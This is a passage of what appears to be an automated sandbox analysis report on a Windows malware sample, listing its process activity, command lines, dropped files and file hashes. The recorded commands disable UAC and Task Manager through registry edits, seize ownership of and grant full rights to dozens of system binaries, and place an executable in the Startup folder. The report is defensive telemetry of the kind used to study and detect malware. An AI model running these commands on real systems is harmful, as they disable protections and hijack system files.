PID 2060 wrote to memory of 1584 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 2060 wrote to memory of 1584 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 2060 wrote to memory of 1584 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 2060 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 2060 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 2060 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 2060 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 2060 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 2060 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 2060 wrote to memory of 648 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 2060 wrote to memory of 648 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 2060 wrote to memory of 648 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 2060 wrote to memory of 1120 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 2060 wrote to memory of 1120 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 2060 wrote to memory of 1120 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 2060 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 2060 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 2060 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 2060 wrote to memory of 1772 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 2060 wrote to memory of 1772 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 2060 wrote to memory of 1772 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 2060 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 2060 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 2060 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 2060 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe

Processes

C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe

"C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe"

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\bfsvc.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\bfsvc.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\HelpPane.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\HelpPane.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\hh.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\hh.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\splwow64.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\splwow64.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\winhlp32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\winhlp32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\write.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\write.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\SysWOW64\raserver.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\raserver.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\SysWOW64\msra.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\msra.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\SysWOW64\quickassist.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\quickassist.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\SysWOW64\sdchange.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\sdchange.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\SysWOW64\CameraSettingsUIHost.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\CameraSettingsUIHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\SysWOW64\logagent.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\logagent.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\SysWOW64\rrinstaller.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\rrinstaller.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\SysWOW64\gpscript.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\gpscript.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\SysWOW64\mavinject.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\mavinject.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\SysWOW64\provlaunch.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\provlaunch.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\SysWOW64\msinfo32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\msinfo32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\SysWOW64\runas.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\runas.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\SysWOW64\mstsc.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\mstsc.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\SysWOW64\sdiagnhost.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\sdiagnhost.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)

(The same takeown.exe and icacls.exe pair targeting C:\Windows\System32\tzsync.exe is repeated many more times in the process list.)

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-709689283-2055849101949842402-153643571888924940-14996632309847464711979651982"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "137857777010329804201164124771303368724-1644527247-1829017987-1103304711-1019436764"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-264548951-1711996520-1404011878-1147037927948178777120704736150478956-2091202261"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-2004662112512727622-1108871614-435588241849605340-2128894296-257231209-1626178805"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1681973262-596833653888554449-1089427848-1693696823141320108215669703911628168038"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1445128247168385105365985226-1591265051216921449-561846817-2047314024-756471313"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "1882711474-299074114-847160533-216827202-912708457193418439918957712332026437265"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1215622477-36191993818566640142147348826-443317336970560604-810888011895510853"

Network

N/A

Files

memory/2060-0-0x000007FEF5D33000-0x000007FEF5D34000-memory.dmp

memory/2060-1-0x0000000000D60000-0x0000000000D88000-memory.dmp

memory/2060-2-0x000007FEF5D30000-0x000007FEF671C000-memory.dmp

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\CSWhg3ghGbH.exe

memory/2060-1108-0x000007FEF5D33000-0x000007FEF5D34000-memory.dmp

memory/2060-1245-0x000007FEF5D30000-0x000007FEF671C000-memory.dmp

C:\Windows\System32\tzsync.exe

MD5 840a59de661221c436744d41f82ee73c
SHA1 2848a676726e67ea11ac1476b84e8fb42a7a5110
SHA256 17164a5127bac8a92fd16db540f528175d8b6a6d1a01b3d579cc2e97c223a923
SHA512 5a2d4abf77943f00cfb02853ab44e08c8adb9703a94a5904e8d569e854fe05470dd8e75ca7afd43d574e3be1393c901927454d639b433db350d8db13a4b50e1f

C:\Windows\System32\tzsync.exe

MD5 1824f3a9bc6f80dc5cded30d1e6a7dcb
SHA1 ed0625997babb8d88da345a911d6b4340f2504bb
SHA256 252af8c3918b91e6ded6afc76f620d48d009e4de89ca565e4bf483ae74def1db
SHA512 bf142c4438dc2fd9e481226743c8911b2483d922b0aede49849195967b53ff874aafd52651b3a55df574d156a095bf1c47d10f7e13e22e52ac1f5e3cb95c0e77

C:\Windows\System32\tzsync.exe

MD5 47b3d733c8bafdb1c22f75ebaaafc283
SHA1 d2baf9fecda5e8f868a329485c74d66d99b9d353
SHA256 8f9294356883ae032b8a29401816bd30a01a9039271d309f67a3fc6b6885d862
SHA512 2590503791e2933d0fa2dce320c4dc703e55ce1b2113ac2c5aab29061e5da2f15c481dc63141fbc9924f38db7b22d3c06890227b8bbaffa8147d2b67dddec6a1

C:\Windows\System32\tzsync.exe

MD5 db4a9fac1f33c774990eeb3b2dbd4bda
SHA1 86d8ceeb376eaddbc2b3cf44435db636c1a1ebad
SHA256 63b66de05e1df906082cf1dbed9d00531db6d650f68aacf870f8859efa683fed
SHA512 4ef44b4fa2d42c9a2243760c2d14f679292ab8d8fe09f9ec2cba6f7a581766386bcd73cd439438204201b9792393b023c4d0c2f09c8f7116bfbf8dcb4407c7ad

C:\Windows\System32\tzsync.exe

MD5 5e085a5f09275af300ae1b468fa2ca6d
SHA1 5775bc3a3dfc4b8d34f983251f5a4f73aaad4554
SHA256 2f9376d3d86bd2167d32f1d1536e58de2599e078ef2f50341954716f2175014e
SHA512 4d4be82cc2a5cc06abd4471a8df6e1dbfcfbe71ae28b16e48b57db2411beaf102feb353a185f3a97afe1e250b813eaf88628729d9a4ceaca1ff805fc17bf36c5

C:\Windows\System32\tzsync.exe

MD5 7e361b2f6e4d368c36a7779a471c935c
SHA1 dbcabd71717d9a7429743d95c60a436e10919e96
SHA256 d8b5cdf16b9725fc840e7d56d28100b55e95a256ebfeec15ff1bfe35ea43845d
SHA512 f984605c7709aae617a3835a4e5dfffa548a38a018e12423982fdc11e5c85df887e126a03ea5994cc9ad3dafa07cd261ee1a9364bcffed94d8becda455cf7346

C:\Windows\System32\tzsync.exe

MD5 781477b19c90e2d8d057ac5003d8bf54
SHA1 bcceb3fa1c4c4f11808569baf55622e368115827
SHA256 874cb622f1cb21f07bbcac6b49156c1eeabc9931370f54290b511ad087f7d187
SHA512 d0758e05df2c73b0cf36badf8bb9bed681f22a76c88173e913029b72ecefde1e79c304cb782e07de521f47c314218f0897a8cca60dc0f2f2681f8a74368e302b

C:\Windows\System32\tzsync.exe

MD5 5c0ce0d624fff6d8298286c5091bbc40
SHA1 949b86014298e4250356ab29f557c1cbaa7140c5
SHA256 dbd1a7a63228864c236a833da1b1b4f5e62c9a2040c3fd66d7a3ebffb1ddd787
SHA512 ae3b77af46dcef4b549d4d635c198bbf7e9a8c173360865ad99caafb078b3a3e219c160bb3aaf2405920c8603c2708ab71a29928d98774aa9ac6c2c1d1a71bd7

C:\Windows\System32\tzsync.exe

MD5 ff6f328f4ed363e8d56fd0aad781a198
SHA1 34abd0f126ca5eb950df14159db382eff09a753b
SHA256 c806b029b7b3bada6cf411f111fe1b4fdbdda675b8fdfedc98f4171641daf6fe
SHA512 dc05949b969ca3e7e08b138aef4c3baccb7f08161d8bc2ac8d0a2a94da94b8c5acac0cc5cb79ecd7ed40834410b51540c94f3d1be9b675e30cc33ed31ee224ec

C:\Windows\System32\tzsync.exe

MD5 68693d4017b733afba4b1fbf47ff48c6
SHA1 6993dd8f0d6989f261c47579ed70c03f91d98d2b
SHA256 5ee8ea9d277bf7278b1b68c9418dcdf97db27698d9917e0277bd8dcc555544a2
SHA512 9f15f4dff9938d24512cae01f586e8f265e51c1f4f691398ba44a5f6aabc462b24d8f27e9a2cc6b67a05b42b86d45f77292a2242ff6df74fc17b2c9a6f207350

C:\Windows\System32\tzsync.exe

MD5 6f6966554fb8724f22a754013f76568a
SHA1 cf56b0c96f665dba26d9f6b8091cfda4347f368b
SHA256 1b3e501e39d94797f194d3dfac8b9e87ab7e2e73a579b2b130d28472e4efbabb
SHA512 9a4804d189feacb7f4011865913b07cf2737e4e76acb67ac882fc651f01a28ead0e1115ad283a2faedf30b4eea2b4767130104ba22c4b0c0f4718951fc42837e

C:\Windows\System32\tzsync.exe

MD5 d1718b06fcf282223d83dc960d8e7603
SHA1 a399fd3cf970bb86f980b4750d2c333c6149a2fc
SHA256 60cd343425d7b44a5c92a17bfbbcb7054350ee82a43f024fbfe28032e7711071
SHA512 8debd5b7717c8c80bbec490e5e73e668bf400c47afbb8ba25ded640046bd93b963086065305fd067f20290701b221642c8a572f63a254e66c34cdc3dece069aa

C:\Windows\System32\tzsync.exe

MD5 0a5ead827c6bb13f7252fa02872436f1
SHA1 784a3ff7a2b1a1f96d2c1b67c141e21a2ac7faa4
SHA256 6f1d6c5e3c0110e6b658f8db6938a128b6d51f89dd8e8a74e13c03e7c01b1770
SHA512 f4146c306ee5bd226bc6e60a294d19ef0a544dff9a4f27faffaa4059a9dcf05598184afef31cdb999b064c893ca484d8d6e6ebdf1e990ceeef56c6a791c440a1

C:\Windows\System32\tzsync.exe

MD5 588fd91751d91026a9c9e2a12394ba52
SHA1 4c29a70f524a31efdda82ff19a306d70ad558a39
SHA256 290e0c25c07bf76c506cc6232051c7ee8c4976ad47e71ee11157e558db940c64
SHA512 baa8056853869c528a8de1d2e36c6c495dbd725cadd8f5447ba1b0c17826e0dbc49e5a8d32a558c9dd7c5ae045b7d52b67b6fc633688f31ddd781219546b0a98

C:\Windows\System32\tzsync.exe

MD5 07226451583c123c9a407a28285a3046
SHA1 ad6d98808fc5022f5b80cddfa961cac010fb62c8
SHA256 34c42bed1adc7ce7249b858d973c582bfbd5aaaff22e06062badacb6a845b702
SHA512 ff8b6d730043487be090c727cc052c8d7a45095165be0041c41f6321105ae0aa5e1a2c091caa16dbd9d976f4b301ab6b9914a73172ca2e247b7913d19824b4ae

C:\Windows\System32\tzsync.exe

MD5 4499f3afd4e4643ec87a68fce0426d83
SHA1 ee525a5926311f2e6350768e1ba83b47429e0db8
SHA256 76e0ca278f5749d7f2a60f4bebb999479de3ab4c60a36d47f39ddd4c30dc21cd
SHA512 b5bce6aef246bc74929299b54232af3f9a1bdef783b1873009b67046fdadc07d3b7d8e564845c0b03dc9c3a6c7f3bff6eeef68c1af8aae4ca02c4e5a12df5d43

C:\Windows\System32\tzsync.exe

MD5 831f82b91ea622dea77ae381b17b727b
SHA1 c3289d0633b64a4ea8f59484fab1b5b39cc36aef
SHA256 bb3a35a81709c141083a51225a92a9558ed9b562098f75cdb4ac49299547669c
SHA512 014cff999b35dcbe90354c8fb21d598d9d1fb5421b1ab3b15a1a7ac9a520d6299a893728dd642d4c27e5e191cbeb84f37a8185203852e017c51cf9947599210c

C:\Windows\System32\tzsync.exe

MD5 6550480b62a7c28c72034d2b82b16f3f
SHA1 2400ab543720df935f93e6270b4a00feaf17a7a4
SHA256 4e3f79772a4249b279b4ffd41ca075b93a5b76e59dd8aeedf33047456adfa987
SHA512 d2987c99a1b6d325768d1d5a632d34edb621a75f4bcf790dda345aa3cc0a9710000ce53626ba70215bc81ce37145c5718ede0d318c5751b2b05e30cdf26fe1ed

C:\Windows\System32\tzsync.exe

MD5 dff5cc23fd991d14eb8c1f3a005b498c
SHA1 258c76df6e986ac2b44a5ccbd3bb5a0db9b62634
SHA256 09aa59fd31c2e011f926be38130fdeab54d77f6baaaf7029d1648a44244902d8
SHA512 a726dceb847cf95ea05969d5547c4645d742c5156dfbfd9cc8e115fc534723309b7cc7d42c87ab16d124c4f4c89a8796272968906202eadb1e82bd604acd831d

C:\Windows\System32\tzsync.exe

MD5 d020fe42c0afaa9a4c580e576d640537
SHA1 a6631c9db9019031d9654fa643e198268f6c1275
SHA256 e4bbfebb36a0a31f626fa8fa38a51fb07e409f4d472e06c7157cb285fa0eaf6c
SHA512 d9f53a83f084bf0df2332d2326145925c7c3d2865d67182689cdef4d5493a7ad6039198c38b5e48ea0efa2ba5f0440e84ece97c830aea3c305f3bd56b753c8c2

C:\Windows\System32\tzsync.exe

MD5 51a1f1d81e85af9df8f2076d2906a38a
SHA1 386cbf62aee3f182c6c9ce321e8da77d24a7b55d
SHA256 27acac566391b0af746d360d00a033bcc074dd0eb3682c15658c518e9086eedb
SHA512 eaa0cbeb93b3b383fb64086a84dce713ce1803df323b3e3f6128cd6ede53cb60aa207fb9f4de6a5694aedd6edc81b685f7586f514feb73d24af018ccf811fd48

C:\Windows\System32\tzsync.exe

MD5 2ba8283eb9f80171d9017e72aa2c13de
SHA1 bf23b8babc9658a444601e77e27757c338c4fe78
SHA256 87d9351f74d71e65628fcdd02c90421ad4c27ca9a6a6a41b10eab52b5de45c16
SHA512 8596f75d0e63eb4ec0f5a5d6cc710663e7905b4bd34a57a6a1f1d5ebf4dbbacdf9a5c12c3915fb5531f8bf218024176ae16b910ce7b3776e35c87ebe806f3dcf

C:\Windows\System32\tzsync.exe

MD5 2d6acb37e8de5ca58d772bf3c47edfe8
SHA1 63e80ae2d8a1bbba21b94d9b5dd091b2e66beea5
SHA256 80908a11b78414374e599d39c08e37db9370b78f233336edd23ab4b3143ace55
SHA512 95a76af40227ca9b2b3f1b30c43a3c52ca7bfebab574780a8f7ecdab7cacb5335424948a871e2db85f88d0b5f034c83b3584911b307a85562cbb13e37330dba5

C:\Windows\System32\tzsync.exe

MD5 2cc33c4262c5cfb142ca3f564ba94114
SHA1 e12ced3c7e36e165f7279dd3766ff123f013b632
SHA256 c8617e2b2a6aa718e88d45e8d3fb9c2e50920a9a00f669c71956e7d6fbb4b3ab
SHA512 76698b4af16f4035320f50968862c7a0f29646e381c028f71c564a2172618e38b7e11f422b201ffe11aaa010c4c93c66a5a9cc67e56d64abe52016a31b5a973e

C:\Windows\System32\tzsync.exe

MD5 dc0f208f38e1e19029eca1c0c8146e73
SHA1 2b3e6dceb524f3b57eff3cdb4fc1730743698106
SHA256 fe83141ca416248aac51cc6e2aae72fd3f08d66cf4f8aef1237d8ef8c72e1d1c
SHA512 7a5631d6e19fcf10a98158a5dcfd78aee5cfbea9bc6f129eee77095673c023bac00e16622b7420b2f1900604cafc0e122b7ee8bc3188c43c520d5b89bb2fb477

C:\Windows\System32\tzsync.exe

MD5 8b5fa0748b46f1e08f063ac6ebf4081b
SHA1 149ca6ef30311f04c08ef4fcd8ea58d6ebba3e1e
SHA256 9b460ff0147b10c42f7b4acc77e60157f246e6584d00f3430c2b2d557078d058
SHA512 945a664729cf06d1e9abf9eb75e4dadc82859be6ae8a6e25667cb46bf1bfbfe5421e39e10e4226224a93d3814cdeb794221d5b20164f861149e17a02e2a3afdd

C:\Windows\System32\tzsync.exe

MD5 f202f10b77eac6bbb94ee33cfd0f6131
SHA1 3b21ca3d197cc96dc0753361e1e8eb68543b5046
SHA256 2afba7d3130fe417c6521550f6ffebbb123fc44136e9382ae5d99b5173060127
SHA512 d226cd059b44f179dca0cfd25f9fe99b9e771eda20440707e39e58968e7d90d8106a119a84738aba4078537c7968e3444f5deb5fed79b384a21085b699ded239

C:\Windows\System32\tzsync.exe

MD5 b0d8ddd3c56e9131055524488fea1cf1
SHA1 9f3ecd4017ccd985b69c81eddda0d67b5ff5917e
SHA256 9ed751ed447e5d00c610226fe1e9cce4d4116a8990aaa707ec3bf67bec9b30a3
SHA512 41e5e9c7085f2638a9f00357265ce5e70ab2ee6b6b4322b650af757194cd6505a0bf2ab4cffdfc905620d9d2fb756627867f12001af92507bcc105d6f83ab656

C:\Windows\System32\tzsync.exe

MD5 5e4fc9659208ee020215fb2a239119ad
SHA1 dea15285b625344dce183429a922b6c8e9e5b427
SHA256 5afb14a1c24ec5f384bcee178b7ab6cf880bce10173627965d5c666832f07bf8
SHA512 ddadf42fcf9edf6ff326734569ca75dc50434c2246829b77f713ac63159f019b1cc42675f25c1905f6b5da91585f0e825ab262942e4f423b0b9ea2878031d0e8

C:\Windows\System32\tzsync.exe

MD5 5fc18e4286e08845d96592c0c0d7f2f0
SHA1 0871954c304abc20af40ff58294c8d5c65374107
SHA256 f45ea564b8c47fcbf3a25c5be24586e51705f2ecea50e984408bfad58dc00c25
SHA512 447702d2d926b066cad4ad1ad04e287a45b0d668031cf07a372e8468ae320446a38c008c2833612d5f053c56f17a0a398668b93a420e48399200813964a924a6

C:\Windows\System32\tzsync.exe

MD5 1815d1ec57fd7e5df232099c435e0451
SHA1 1ee650dfebf6cf4d068cd3330d8a82070681e09f
SHA256 892e390a6c6bd2fe25dc87b1bb4f54366b4acfeae8cbd62482ae6066f8856d33
SHA512 0962e0b96bd5410fdc1271226b3444e544807e1e94778fe9db29ada403c1f3d90b6976ca43abd958656a571ca3fc278c3bc8825b030f60aeb0044b2b2c4218b3

C:\Windows\System32\tzsync.exe

MD5 9ba9f001a50d09b69fb429651a91b5c1
SHA1 52ee803c10e681bd521fa307d101262304a28113
SHA256 96c9563b12657ffb5695a436d9d9b9ff5ff903dfb3316dee63b454173cc8316e
SHA512 c164556e23e33eecc759c5c9429de2df1e9e34637c7e9d14b07c6b23b805ce1a4d2dd1b9d91ed8435f76ed30e41fa226f04ae6fe06641fbd0667b9236174dd5f

C:\Windows\System32\tzsync.exe

MD5 ac5403a8b9a4aff115094c8c253d011a
SHA1 1075cfaa2782b7c4310dc16a7cc5d64f796af159
SHA256 65e23fc57b76b7b709f0129dc12f93df5861e7d796e19e8ce1ef5afa83449d88
SHA512 25ce6e0df5df80adb944cff47264ad1969e9b71b7885cdc8d29eabfb71b730fc59ea8a0e982ecc179ff2fc4bad1f6fb6f12a4edc2ad643fa359de220dc130922

C:\Windows\System32\tzsync.exe

MD5 d3c9cd3bf70e51d3e9b328c7b9d0b304
SHA1 8ecf7a0e1e030d100179530c06c3e63420a14c56
SHA256 6bddcb86f0e114de7940cacaf0b3457452e99d50651836a13d3e50c9a9eb6b63
SHA512 a38ce8d50fce9f98ac5a5f9442ed4da2173d3c7f8e0be06064ce117adb3b5ca962ba3d923be052e99c35fb476e04a71531fdc724e4a5fd69a981ecdbb31b2230

C:\Windows\System32\tzsync.exe

MD5 e1bd79e71cf203927428c12ec0c664b5
SHA1 150b45d2e580c63f607b0c4a10635d92cd6d6a1b
SHA256 7b64c9cc1bc540c3c18208dec3f0cb3c96fd3494634a9238291faa229dd732de
SHA512 9834b77de6a9ce26c46b9bdff8f021fda81e937bbda6c438be10728efd1b722a1cdb4c588361fb62d69c35844c74ab480a85d408d0a5d97729806fcba6555f3b

C:\Windows\System32\tzsync.exe

MD5 3359ed8912e2faf9eb658c93bfed5e32
SHA1 55bbd71e4c938b75f780d3c883b6825182448ac0
SHA256 854b8b5c69b7fd2bc98b880d8dbefbc5c597e93574cdb5bbcf46f5da0514a7f3
SHA512 91847765bce53410941b54a0a588f432c088e7f02b2af1459fef103ff21c803432d0c4b963e42372f2b27c17e38483420384f87b4deae80fafa8327ef9ca8613

C:\Windows\System32\tzsync.exe

MD5 0cacb14acf616ce369bc4a1060e9e2c8
SHA1 5d6d6277815eda65a9254095dc5fc9b730a27c95
SHA256 50f3222d7e4ea849c2851f6912321a146ca5751c0c3836d72d9a5db2b5bfdef3
SHA512 a3fa6bd87b31be9cee78cbcd1bf42a7d7f01972fce22eeef8bca12c21c4ef0de1ad980588f4227badd33261ffb46d430b4d04be2ad98b2ff6b471856c4513ae8

C:\Windows\System32\tzsync.exe

MD5 5b93692cd2f48807968b7be1acce095b
SHA1 66d438205261cce61d7bde3f029ff697e33071b9
SHA256 d2e09f66b3ccdb0584249d61f2b6806fe9b10a30998311f56ebf5df775ebfc31
